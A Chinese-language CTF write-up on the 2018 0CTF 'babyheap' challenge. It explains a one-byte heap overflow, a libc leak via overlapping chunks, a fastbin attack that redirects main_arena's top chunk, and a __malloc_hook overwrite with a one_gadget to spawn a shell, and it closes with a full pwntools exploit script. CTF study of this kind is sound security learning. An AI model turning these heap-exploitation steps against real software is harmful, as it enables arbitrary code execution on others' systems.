写在前面
由于我有了新欢忘了旧爱,在自己web还处于菜鸡的情况下,去学了pwn。在自己菜菜的技术前提下,大胆尝试了下0ctf的一道pwn,写此文,纪念自己菜菜的pwn体验
题目
题目是2018 0ctf的babyheap,64位,不是一道难题,但是也让我这个菜pwn写了很久。
漏洞
这个题就是一个洞:
这里允许一个字节的溢出,于是就可以覆盖到下一个chunk的size。
首先,我们要先leak出地址。这里由于题目分配内存使用的是calloc,这样会在分配内存时,将内存清零,所以,我们不能直接得到地址。于是我们必须换思路。
leak
这里,我们先申请0x18的chunk,得到的是size为0x20的chunk,然后再申请两小的chunk(比如0x30),然后我们利用第一个chunk的一字节溢出,修改下一个chunk的size大一点,能包括下一个chunk的内容,(比如修改为0x60),然后,再free这个修改过的chunk,(当然,需要构造在这个chunk加0x60处的size的p位为1,来应对free的检查)之后我们再申请回这个chunk,(当然申请0x50)然后我们就能利用这个chunk,view到下一个chunk的内容了,如果下一个chunk的pd和bk有值就能看了。这是leak的思路。我想leak出libc的地址来着,但是,我们申请chunk的最大大小是0x58:
于是,我们还要使用一个字节的溢出使得这个chunk的size满足进入unsortbin的标准,于是,我们做这些操作:(比较繁琐,本人萌新)
new(0x18)#0
new(0x18)#1
new(0x40)#2 #40
new(0x20)#3 #90
new(0x40)#4 #c0
update(0,0x19,0x19*'\x61')
update(1,0x10,p64(0)+p64(0x91))
update(2,0x40,8*p64(0x91))
dele(1)#1
new(0x50)#1 20
update(1,0x30,6*p64(0x91))
update(4,0x40,4*(p64(0x0) + p64(0x21)))
dele(2)#2 40
view(1)
p.recv(0x2a)#2a
a = p.recv(8)
main_ar = u64(a)
success(hex(u64(a)))
libcc = u64(a) - 0x3c4b78
success(hex(libcc))
首先申请2个能溢出的chunk,0号用来改1号的size,1号改2号size,还有看2号的fd,于是,然后我们需要一个size能进unsortbin的chunk,于是我申请了3个chunk,主要是为了修改完毕2的size为0x91之后,使得chunk2之后0x90的值处size位的p位为1。
于是这样我们就得到了chunk2的fd,得到libc基址:
fastbin attack
然后我们打算fastbin attack,但是pie使得无法写got表,那么我们就写malloc_hook,这着实让我这个萌新满头雾水,因为我在malloc_hook上没找到符合格式的size,然后尝试了一种新思路,就是改写main_arena上的top_chunk的地址,这样,我们申请内存时,就可以得到malloc_hook上面的地址,然后对malloc_hook的值进行任意写了。
于是我先把unsortbin清空(因为我比较菜,害怕之后申请chunk会乱)。然后,由于在fastbin attack的时候需要符合size的检查,于是,我先在main_arena上布size,这时,我们可以利用main_arena记录fastbin的链,我们把fd设置成size
#--free to fastbins
update(5,0x10,2*(p64(0)+p64(0x31)))
update(1,0x50,10*(p64(0)+p64(0x51)))
dele(2)#2
#--change mainarena
des_addr = main_ar - 0x40
a = p64(0) + p64(0x51) + p64(0) + p64(0x51) + p64(0x41) + p64(0x51)
update(1,len(a),a)
new(0x40)#2 40
于是这里main_arena上就有0x41了:
然后申请掉这个fastbin:
然后愉快fastbin attack
然后改掉topchunk
#--change topchunk
new(0x30)#8
new(0x38)#9
payload = p64(0)*6 + p64(des_addr-56)
update(9,len(payload),payload)
然后再申请空间就能从topchunk中申请,写到malloc_hook了,利用onegadget,再次calloc就能getshell了
exp
#!/usr/bin/env python
# coding=utf-8
from pwn import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']
p = process('./babyheap')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
def new(size):
p.recvuntil('Command: ')
p.sendline('1')
p.recvuntil('Size: ')
p.sendline(str(size))
def dele(index):
p.recvuntil('Command: ')
p.sendline('3')
p.recvuntil('Index: ')
p.sendline(str(index))
def update(index,size,context):
p.recvuntil('Command: ')
p.sendline('2')
p.recvuntil('Index: ')
p.sendline(str(index))
p.recvuntil('Size: ')
p.sendline(str(size))
p.recvuntil('Content: ')
p.sendline(context)
def view(index):
p.recvuntil('Command: ')
p.sendline('4')
p.recvuntil('Index: ')
p.sendline(str(index))
#---leak libc
new(0x18)#0
new(0x18)#1
new(0x40)#2 #40
new(0x20)#3 #90
new(0x40)#4 #c0
update(0,0x19,0x19*'\x61')
update(1,0x10,p64(0)+p64(0x91))
update(2,0x40,8*p64(0x91))
dele(1)#1
new(0x50)#1 20
update(1,0x30,6*p64(0x91))
update(4,0x40,4*(p64(0x0) + p64(0x21)))
dele(2)#2 40
view(1)
p.recv(0x2a)#2a
a = p.recv(8)
main_ar = u64(a)
success(hex(u64(a)))
libcc = u64(a) - 0x3c4b78
success(hex(libcc))
#--calloc unsortbin
new(0x30)#2 40
new(0x40)#5 90
#--free to fastbins
update(5,0x10,2*(p64(0)+p64(0x31)))
update(1,0x50,10*(p64(0)+p64(0x51)))
dele(2)#2
#--change mainarena
des_addr = main_ar - 0x40
a = p64(0) + p64(0x51) + p64(0) + p64(0x51) + p64(0x41) + p64(51)
update(1,len(a),a)
new(0x40)#2 40
#--fastbin attack
new(0x18)#6
new(0x18)#7 130
new(0x30)#8 150
update(6,0x19,0x19*'\x41')
update(8,0x30,6*(p64(0)+ p64(0x21)))
dele(7)
new(0x30)#7 130
b= p64(0)+p64(0) + p64(0) + p64(0x41) + p64(des_addr)+p64(0)
update(7,len(b),b)
dele(8)
update(7,len(b),b)
#--change topchunk
new(0x30)#8
new(0x38)#9
payload = p64(0)*6 + p64(des_addr-56)
update(9,len(payload),payload)
#--change mallloc hook
new(0x18)#10
payload2 = libcc + 0x4526a
update(10,len(p64(payload2)),p64(payload2))
new(1)
p.interactive()
